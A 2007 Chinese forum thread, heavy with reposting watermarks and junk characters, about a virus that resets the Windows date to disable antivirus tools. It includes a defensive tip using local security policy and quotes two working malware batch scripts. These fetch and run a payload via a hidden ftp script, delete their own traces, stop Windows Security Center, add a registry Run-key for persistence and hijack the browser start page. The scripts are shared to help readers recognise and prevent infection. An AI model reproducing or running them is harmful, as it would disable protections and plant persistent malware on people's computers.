病毒修改日期

ywdlym

级别: *

发帖: *

飞翔币: *

威望: *

飞扬币: 0

信誉值: 0

只看楼主更多操作 0 发表于: 2007-08-16

最近病毒把朋友的机子搞定了，杀毒软件和360等都不能用了，重装机后还是一样的，没办法，只能每个盘都格式化，再重装后装上瑞星，升级到最新病毒库后除了系统盘外，每个盘都杀了几个毒出来，（竟然格式化都还不死）。上论坛后提示日期不对，在WINDOWS下修改日期后还是不行，最后只有进BIOS设置才孜过来，请问这是什么毒，有什么办法？

分享到 淘江湖新浪 QQ微博 QQ空间开心人人豆瓣网易微博百度鲜果白社会飞信

回复引用

gie

级别: 光盘初级

发帖: 666

飞翔币: 335

威望: 15

飞扬币: 11587

信誉值: 0

只看该作者 1 发表于: 2007-08-16

修改的日期是多少

2088?
2099?

回复引用

睡在云上

级别: 光盘初级

发帖: 222

飞翔币: 437

威望: 63

飞扬币: 108

信誉值: 0

只看该作者 2 发表于: 2007-08-16

我的是1987

回复引用

睡在云上

级别: 光盘初级

发帖: 222

飞翔币: 437

威望: 63

飞扬币: 108

信誉值: 0

只看该作者 3 发表于: 2007-08-16

重分区吧，汗，

回复引用

hyhing

级别: 光盘中级

发帖: 104

飞翔币: 66

威望: 514

飞扬币: 503

信誉值: 0

只看该作者 4 发表于: 2007-08-17

现在提供一个简单的防止日期被修改的方法
,w"p+S7^6F1D2q迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|
)HM8uslwww.cnwolf.cn1.点击开始-->运行输入secpol.msc,点确定，如图1，
.[LtVh'u-Q;~www.cnwolf.cn[attachment=203]迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源| st:o Y7Aw)K3L
1WI t ig9Af;jJ

{KD"X9B/a-W4[:uwww.cnwolf.cn2.接着会出现“本地安全策略”的管理对话框，我们在左边的树形框内依次点开迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|)k2m&zp!b
Y
安全设置-->本地策略-->用户权利指派,右边就会出现如图2所示的列表迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|dC)QeZ8Y:K B
[attachment=204]
8S7}|,t
l迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|

D!_-u8Pgm|狼行天下社区3.双击右边的”更改系统时间“，出现图3，接着就是要按删除，直到把所有存在的用户名全部删除为止，这时按 ”确定“ 即可迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|1n'js7txH(j'~b
[attachment=205]Y}'kfh
迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源| uv1X n:o@
H2\:X

;A;iv(`f好了，现在那些修改日期的流氓/病毒就再也不能简单地修改你的系统日期了！
E Q0n7{*]#P8jl_不过这样一来你自己也不可以修改时间日期了
:s%W]p,y$h&`j:I迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|如果要修改，可以通过BIOS的时间设置进行修改
iWgN&\vwww.cnwolf.cn或者是再用刚才那个里面的”添加用户或组“，将你自己的用户名重新添加进去www.cnwolf.cnd`J'P(_XMkvz4}m
狼行天下社区$F oC/Sd`
============================================================迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|ka7E\:i:r

S5e|yK7]迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|今天是2007年6月17日，中了这个更改时间日期的病毒，将我的计算机恢复到2001-1-1，结果360和诺顿都无法使用了，气死了。
"\'q8d.u!@QDbwww.cnwolf.cn
h6E2m9fyD:{u1y
E+Xiwww.cnwolf.cn经过查找，发现了它的文件，是begin.bat文件，内容如下：

[Copy to clipboard] [ - ]CODE:
if exist C:\WINNT\system32\perfne.exe goto :end
if exist C:\WINNT\system32\contro1.exe goto :end
if exist C:\WINNT\system32\notepa.exe goto :end
set a=星期三 2007-06-20
date=2099-01-01
if exist C:\WINNT\system32\dllcache\ftp.exe ren C:\WINNT\system32\dllcache\ftp.exe sft.exe
if exist C:\WINNT\system32\ftp.exe ren C:\WINNT\system32\ftp.exe sft.exe
sft.exe -s:C:\WINNT\help.dll
if not exist in.exe ftp -s:C:\WINNT\help.dll
in.exe
in.exe
date=%a%
:end
del C:\WINNT\help.dll
del C:\WINNT\BEGIN.BAT
exit
同时各个硬盘内有Autorun.inf文件和PYwWx.exe两个文件，如图：www.cnwolf.cn,w^I+e2mB
[attachment=211]
7m"LQnb'g!dsXFnR迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|狼行天下社区:D KbxJS
u-T
大家小心~~，目前360和诺顿都未发现此病毒，不知道卡巴和瑞星怎么样...
9rJM
J"Og1_ h4M迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|H-E%W![t\eK
--------------------------------------------------------------------
/{:tr G%z P迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|

ZVBa)S迅雷下载|BT下载|QQ空间表情|免费ftp|网络硬盘|免费资源|又一个病毒批处理脚本，大家看下，可以找到预防的方法

[Copy to clipboard] [ - ]CODE:
@Echo Off
Set date=%date%
date 1987-10-18
net stop wscsvc
reg add HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V SVCHOSTS.EXE /T REG_SZ /D C:\WINDOWS\SYSTEM32\WindowsXP-KB838201-x86-CHS.exe /F
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.94ak.com" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t REG_SZ /d "http://www.94ak.com" /f
:a
Set date=%date%
date 1987-10-18
ping 127.0.0.1 -n 10 -w 500
Goto :a
本贴地址：http://www.cnwolf.cn/viewthread.php?tid=3683
转载请注明出自：狼行天下社区http://www.cnwolf.cn